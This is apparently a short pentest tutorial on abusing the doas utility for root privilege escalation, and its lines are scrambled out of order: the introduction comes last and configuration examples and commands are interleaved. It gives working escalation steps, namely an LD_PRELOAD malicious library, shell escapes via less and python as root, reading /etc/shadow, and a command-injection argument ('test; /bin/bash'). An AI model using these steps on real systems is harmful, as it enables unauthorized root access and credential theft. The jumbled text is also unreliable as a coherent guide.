Hacktricks Doas Apr 2026
Example script:
gcc -shared -fPIC evil.c -o evil.so
LD_PRELOAD=./evil.so doas -n id
If doas is called with unsanitized user input in a script.
In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf
Keep hacking. Keep escalating.
cat /etc/doas.conf
permit|deny [options] identity as target cmd [args]
Examples:
./script.sh "test; /bin/bash"
permit persist user1 as root
Once you run doas -n id with a password once, subsequent commands don’t need a password for a few minutes.
permit nopass user1 as root
Check:
doas /usr/bin/less /etc/shadow
# inside less: !/bin/sh
Or Python bypass:
permit keepenv user1 as root
Compile a malicious lib:
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")'
Many binaries allow shell escapes.
doas -n id
# uid=0(root) gid=0(root)
Escalate:
If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.